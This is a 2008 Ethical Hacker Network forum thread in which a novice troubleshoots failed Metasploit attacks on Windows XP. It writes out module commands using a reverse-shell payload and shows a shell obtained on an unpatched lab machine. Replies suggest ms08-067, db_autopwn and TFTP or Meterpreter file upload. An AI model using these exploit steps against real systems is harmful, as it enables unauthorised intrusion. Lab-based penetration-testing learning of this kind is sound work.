HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 79 guests online
EH-Net News Feeds
Latest Additions
 
Advertisement

You are here: Home arrow Forum arrow Resourcesarrow Tutorialsarrow problem with use MSF
EH-Net
May 25, 2012, 03:44:20 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Advertise on EH-Net!! - Reasonable Rates, Highly Targeted Audience.
 
   Home   Help Calendar Login Register  
Pages: [1] 2   Go Down
« previous next »
  Print  
Author Topic: problem with use MSF  (Read 18321 times)
0 Members and 1 Guest are viewing this topic.
mr.Z
Newbie
*
Offline Offline

Posts: 12


View Profile
« on: November 14, 2008, 01:15:15 PM »
I have some problem with use metasploit

i'm test more exploit but not sucss I'don't wht problem

look this example

use windows/browser/ani_loadimage_chunksize

set SRVHOST myip

set SRVPORT 8000

set URIPATH nono

set payload windows/shell_reverse_tcp

set LHOST ip victim

>exploit


 after i'm test this on OS xp sp and IE 7 ,IE 6

after tell me
  • Sending HTML page to ip:6668...
  • Sending ANI file to ip:6668...

i'm wating but nothing happen

>> sessions -l

Active sessions===============No active sessions.

what problem >>>Huh

any idea?

and can any one give me some exploit working on xp sp2 and sp3
« Last Edit: November 14, 2008, 01:23:38 PM by mr.Z » Logged
BillV
Hero Member
*****
Offline Offline

Posts: 1830


View Profile WWW
« Reply #1 on: November 14, 2008, 01:45:48 PM »
Sounds like it's not vulnerable.
Logged
mr.Z
Newbie
*
Offline Offline

Posts: 12


View Profile
« Reply #2 on: November 14, 2008, 01:58:36 PM »
thanx

but i'm show target

--  ---- 
 0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

and i'm test on 7 pc's seam problem  Grin
Logged
BillV
Hero Member
*****
Offline Offline

Posts: 1830


View Profile WWW
« Reply #3 on: November 14, 2008, 03:29:02 PM »
Just because those are listed as targets, doesn't mean they're vulnerable... just what the exploit can attack.
Logged
mr.Z
Newbie
*
Offline Offline

Posts: 12


View Profile
« Reply #4 on: November 14, 2008, 04:55:02 PM »
ok thanx

but can give me some name exploit working on win xp sp1,sp2,sp3,vista

and I want exploit use without send the url to victim

I'm using MSF under windows xp
Logged
BillV
Hero Member
*****
Offline Offline

Posts: 1830


View Profile WWW
« Reply #5 on: November 14, 2008, 10:09:28 PM »
Quote from: mr.Z on November 14, 2008, 04:55:02 PM
I'm using MSF under windows xp

There's your first problem. Run it under Linux.

I can't tell you what exploit to use, it depends on what your target is vulnerable to. As you've already figured out how to do, you can see which exploits will work against which targets.
Logged
LSOChris
Guest
« Reply #6 on: November 14, 2008, 10:26:36 PM »
ms08-067 exploit
Logged
mr.Z
Newbie
*
Offline Offline

Posts: 12


View Profile
« Reply #7 on: November 16, 2008, 01:37:18 PM »
Quote from: BillV on November 14, 2008, 10:09:28 PM
Quote from: mr.Z on November 14, 2008, 04:55:02 PM
I'm using MSF under windows xp

There's your first problem. Run it under Linux.

I can't tell you what exploit to use, it depends on what your target is vulnerable to. As you've already figured out how to do, you can see which exploits will work against which targets.

thanx alot  now i'm work in linux and update msf

----
ChrisG

thanx

I'm test this exploit but show me message problem

  • Started bind handler
    • [-] Exploit failed: The connection timed out (ip-vicitm:4444).
  • Exploit completed, but no session was created.

why this not work what  problem

 but no session was created?Huh

plz tell me

Logged
apollo
Full Member
***
Offline Offline

Posts: 142


View Profile WWW
« Reply #8 on: November 16, 2008, 10:47:54 PM »
You probably aren't vulnerable to that either, or something was wrong.  Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there.  That might get you further in the process.  Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.
Logged
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
mr.Z
Newbie
*
Offline Offline

Posts: 12


View Profile
« Reply #9 on: November 17, 2008, 09:25:08 AM »
Quote from: apollo on November 16, 2008, 10:47:54 PM
You probably aren't vulnerable to that either, or something was wrong.  Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there.  That might get you further in the process.  Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.

You are correct but I want test on full patch windows xp
and I'm try much and i'm show if port 445 open then you can use ms08-067 expoit and if the windows xp full patch

any more Idea?
Logged
BillV
Hero Member
*****
Offline Offline

Posts: 1830


View Profile WWW
« Reply #10 on: November 17, 2008, 12:37:59 PM »
Quote from: mr.Z
any more Idea?

Yes, I think you need to do more research and studying regarding exploits and how metasploit works.

I suggest you start here.

BillV
Logged
apollo
Full Member
***
Offline Offline

Posts: 142


View Profile WWW
« Reply #11 on: November 17, 2008, 05:06:25 PM »
I'll be slightly more helpful, if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like nessus.  There is another option for you to google which is db_autopwn.  If you search for that, and you use backtrack3 things will get easier for you.  If you use this approach for evil, you will get caught, it is EXTREMELY noisy and will have a low success rate.  If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.
Logged
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
geekyone
Full Member
***
Offline Offline

Posts: 177



View Profile
« Reply #12 on: November 17, 2008, 08:05:25 PM »
Quote from: mr.Z on November 17, 2008, 09:25:08 AM

You are correct but I want test on full patch windows xp
and I'm try much and i'm show if port 445 open then you can use ms08-067 expoit and if the windows xp full patch

any more Idea?

Your biggest problem is trying to exploit a fully patched windows xp box with metasploit.  If you want to learn more about metasploit and practice pen testing techniques don't attack a fully patched box in your lab. 

Metasploit doesn't have any zero day vulnerabilities included in it (currently) so you are never going to be able to successfully exploit a fully patched box with metasploit right now.  Now if you really want to exploit a fully patched xp box you should take Billv's suggestion to heart because that is going to involve getting into zero day vulnerability research.  Which requires an in depth understanding of how exploits work.  If you want to get into that I recommend starting by reading Hacking: The Art of Exploitation, 2nd Edition
Logged
CISSP, CEH, GPEN, GCIH, GCFA
mr.Z
Newbie
*
Offline Offline

Posts: 12


View Profile
« Reply #13 on: November 22, 2008, 01:37:48 PM »
THANK YOU ALL

now i'm install windows xp witout servies pack

and exploit this windows

i'm use paylod
>"windows/shell_reverse_tcp"
>exploit
>Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

but I cant upload some file i'm using this msf under linux

test some command like this
>copy /root/xx.txt c:\

but not succss the error msg
>copy /root/xx.txt c:\
The syntax of the command is incorrect
Logged
xXxKrisxXx
Sr. Member
****
Offline Offline

Posts: 491



View Profile
« Reply #14 on: November 22, 2008, 01:47:51 PM »
If your getting files from a command prompt, you have to get familiar with the tftp command. Remember to start the TFTP Server on your Linux box, when requesting the files using  tftp they come from your /tmp directory. You might want to try the meterpreter/shell_reverse_tcp Payload and use the upload from there, it's quicker. The meterpreter also has alot of other useful options as well.
Logged
OSCP, OWSP, eCPPT
Pages: [1] 2   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2011, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.246 seconds with 22 queries.
 

gk_static-ad_feb2012.jpg
Global Knowledge: Build Security Skills to Protect & Defend

els_130x200fixed2.gif
eLearnSecurity Student Course Now Live!
5% Off with Code
ELS-EH-5

SANS Deals 4 EH-Netters
$150 OFF Any SANS Course in Any Format!
Coupon Code: EHN_Connect Including SANS Security West 2012 & SANSFIRE 2012
Recent Forum Topics

cbtnuggets_logo_125.jpg
Try CBT Nuggets Free!

Vote For EH-Net

Add to Technorati Favorites
technorati fave

 
         
Advertisement

© 2012 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.